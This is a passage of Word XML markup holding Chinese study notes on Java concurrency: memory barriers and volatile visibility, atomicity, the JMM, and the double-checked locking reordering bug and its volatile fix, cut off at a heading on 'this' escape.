          <w:rFonts w:ascii="sTHeiti" w:eastAsia="宋体" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>显式锁，原子变量这些同步手段都可以保证可见性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002103F2" w:rsidRPr="002103F2" w:rsidRDefault="002103F2" w:rsidP="002103F2">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        <w:spacing w:line="263" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="494949"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可见性底层的实现是通过加</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="990030"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内存屏障</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实现的：</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>写变量后加写屏障，保证</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>写缓冲区的值强制刷新回主内存</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>读变量之前加读屏障，使缓存失效，从而强制从主内存读取变量最新值</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>写</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>进入锁</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>读</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>变量</w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="002103F2">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:eastAsia="微软雅黑" w:hAnsi="sTHeiti" w:cs="宋体"/>
          <w:color w:val="22B14C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>释放锁</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6168" w:rsidRPr="002103F2" w:rsidRDefault="003F6168" w:rsidP="006451FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F36503" w:rsidRDefault="00F36503" w:rsidP="006451FD">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008444AF">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>原子性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>是指某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>操作在语意上是原子的。比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="00B7EF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>读操作，写操作，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="00B7EF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>CAS(compare and set)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="00B7EF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>操作在机器指令级别是原子的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>，又比如一些复合操作在语义上也是原子的，如先检查后操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="00B7EF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>if(xxx == null){}</w:t>
      </w:r>
      <w:r w:rsidR="008444AF">
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti" w:hint="eastAsia"/>
          <w:color w:val="00B7EF"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A41E3" w:rsidRDefault="001A41E3" w:rsidP="00CE6A5E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>内存模型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>JMM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>解决了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="990030"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>可见性和有序性的问题，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>而锁解决了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="990030"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>原子性</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="sTHeiti" w:hAnsi="sTHeiti"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F9F8"/>
        </w:rPr>
        <w:t>的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRPr="00F41A4C" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCL</w:t>
      </w:r>
      <w:r w:rsidR="00292850">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>是因为指令重排造成的。直接原因也就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>初始化一个对象并使一个引用指向他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这个过程不是原子的。导致了可能会出现引用指向了对象并未初始化好的那块堆内存，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>volatile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>修饰对象引用，防止重排序即可解决。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r w:rsidRPr="00321A49">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://www.zhihu.com/question/35268028</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00DA54D7" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:left="1260" w:firstLineChars="100" w:firstLine="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId143" w:history="1">
        <w:r w:rsidR="00521619" w:rsidRPr="008E29F8">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://segmentfault.com/a/1190000000382965</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分配对象的内存空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向内存空间</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>存在指令重排序，有可能导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用的对象还没有完成初始化。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRPr="00C222F4" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00521619" w:rsidRDefault="00521619" w:rsidP="00521619">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指令重排序，一般来说，处理器为了提高程序运行效率，</w:t>
      </w:r>
      <w:r w:rsidRPr="00436F44">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可能会对输入代码进行优化，它不保证程序中各个语句的执行先后顺序同代码中的顺序一致，但是它会保证程序最终执行结果和代码顺序执行的结果是一致的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00034DAE">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指令重排序不会影响单个线程的执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但是会影响到线程并发执行的正确性</w:t>
      </w:r>
      <w:r w:rsidR="00436F44">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41761" w:rsidRPr="00F41761" w:rsidRDefault="00BF3B24" w:rsidP="00F41761">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>逃逸问题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F41761" w:rsidRPr="00F41761" w:rsidRDefault="00F41761" w:rsidP="00F41761">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41761">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
